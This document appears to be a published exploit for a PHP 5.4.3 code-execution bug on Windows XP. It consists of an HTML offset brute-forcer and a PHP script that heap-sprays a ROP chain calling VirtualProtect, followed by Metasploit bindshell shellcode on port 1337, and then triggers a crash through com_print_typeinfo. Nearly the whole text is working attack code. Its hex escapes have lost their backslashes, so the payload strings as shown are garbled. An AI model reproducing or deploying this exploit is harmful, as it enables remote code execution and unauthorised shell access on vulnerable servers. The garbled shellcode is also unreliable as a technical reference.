// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in(dot)email(at)gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish)
===================
offset-brute.html
===================
<html><body>
<title>0day</title>
<center>
<font size=7>PHP 5.4.3 0day by 0in & cOndis</font><br>
<textarea rows=50 cols=50 id="log"></textarea>
</center>
<script>
function sleep(milliseconds) {
var start = new Date().getTime();
for (var i = 0; i < 1e7; i++) {
if ((new Date().getTime() - start) > milliseconds){
break;
}
}
}
function makeRequest(url, parameters)
{
var xmlhttp = new XMLHttpRequest();
if (window.XMLHttpRequest) {
xmlhttp = new XMLHttpRequest();
if (xmlhttp.overrideMimeType) {
xmlhttp.overrideMimeType('text/xml');
}
} else if (window.ActiveXObject) {
// IE
try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
catch (e) {
try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
catch (e) {}
}
}
if (!xmlhttp) {
alert('Giving up Cannot create an XMLHTTP instance');
return false;
}
xmlhttp.open("GET",url,true);
xmlhttp.send(null);
return true;
}
test=document.getElementById("log");
for(offset=0;offset<300;offset++)
{
log.value+="Trying offset:"+offset+"rn";
makeRequest("0day.php?offset="+offset);
sleep(500);
}
</script></body></html>
===================
0day.php
===================
<?php
$spray = str_repeat("x90",0x200);
$offset=$_GET['offset'];
// 775DF0Da # ADD ESP,10 # RETN ** [ole32.dll]
$spray = substr_replace($spray, "xdaxf0x5dx77", (strlen($spray))*-1,(strlen($spray))*-1);
// :> 0x048d0030
$spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1);
//0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN [ole32.dll]
$spray = substr_replace($spray, "x9fxaex52x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1);
// Adress of VirtualProtect 0x7c801ad4
$spray = substr_replace($spray, "xd4x1ax80x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1);
// LPVOID lpAddress = 0x048d0060
$spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1);
// SIZE_T dwSize = 0x01000000
$spray = substr_replace($spray, "x00x00x10x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1);
// DWORD flNewProtect = PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0
$spray = substr_replace($spray, "x40x00x00x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1);
// __out PDWORD lpflOldProtect = 0x04300070 | 0x105240000
// 0x048d0068
$spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1);
//0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C ** [ADVAPI32.dll]
$spray = substr_replace($spray, "xb4xe8xdfx77", (strlen($spray)-0x18)*-1,4);
// Ret Address = 0x048d0080
$spray = substr_replace($spray, pack("L",0x048d0080+$offset), (strlen($spray)-0x48)*-1,4);
$stacktrack = "xbcx0cxb0xc0x00";
// Universal win32 bindshell on port 1337 from metasploit
$shellcode = $stacktrack."x33xc9x83xe9xb0".
"x81xc4xd0xfdxffxff".
"xd9xeexd9x74x24xf4x5bx81x73x13x1d".
"xccx32x69x83xebxfcxe2xf4xe1xa6xd9x24xf5x35xcdx96".
"xe2xacxb9x05x39xe8xb9x2cx21x47x4ex6cx65xcdxddxe2".
"x52xd4xb9x36x3dxcdxd9x20x96xf8xb9x68xf3xfdxf2xf0".
"xb1x48xf2x1dx1ax0dxf8x64x1cx0exd9x9dx26x98x16x41".
"x68x29xb9x36x39xcdxd9x0fx96xc0x79xe2x42xd0x33x82".
"x1exe0xb9xe0x71xe8x2ex08xdexfdxe9x0dx96x8fx02xe2".
"x5dxc0xb9x19x01x61xb9x29x15x92x5axe7x53xc2xdex39".
"xe2x1ax54x3ax7bxa4x01x5bx75xbbx41x5bx42x98xcdxb9".
"x75x07xdfx95x26x9cxcdxbfx42x45xd7x0fx9cx21x3ax6b".
"x48xa6x30x96xcdxa4xebx60xe8x61x65x96xcbx9fx61x3a".
"x4ex9fx71x3ax5ex9fxcdxb9x7bxa4x37x50x7bx9fxbbx88".
"x88xa4x96x73x6dx0bx65x96xcbxa6x22x38x48x33xe2x01".
"xb9x61x1cx80x4ax33xe4x3ax48x33xe2x01xf8x85xb4x20".
"x4ax33xe4x39x49x98x67x96xcdx5fx5ax8ex64x0ax4bx3e".
"xe2x1ax67x96xcdxaax58x0dx7bxa4x51x04x94x29x58x39".
"x44xe5xfexe0xfaxa6x76xe0xffxfdxf2x9axb7x32x70x44".
"xe3x8ex1exfax90xb6x0axc2xb6x67x5ax1bxe3x7fx24x96".
"x68x88xcdxbfx46x9bx60x38x4cx9dx58x68x4cx9dx67x38".
"xe2x1cx5axc4xc4xc9xfcx3axe2x1ax58x96xe2xfbxcdxb9".
"x96x9bxcexeaxd9xa8xcdxbfx4fx33xe2x01xf2x02xd2x09".
"x4ex33xe4x96xcdxccx32x69";
$spray = substr_replace($spray,$shellcode, (strlen($spray)-0x50)*-1,(strlen($shellcode)));
$fullspray="";
for($i=0;$i<0x4b00;$i++)
{
$fullspray.=$spray;
}
$j=array();
$e=array();
$b=array();
$a=array();
$c=array();
array_push($j,$fullspray);
array_push($e,$fullspray."W");
array_push($b,$fullspray."A");
array_push($a,$fullspray."S");
array_push($c,$fullspray."!");
$vVar = new VARIANT(0x048d0038+$offset);
// Shoot him
com_print_typeinfo($vVar); //CRASH -> 102F3986 FF50 10 CALL DWORD PTR DS:[EAX+10]
echo $arr;
echo $spray;
?>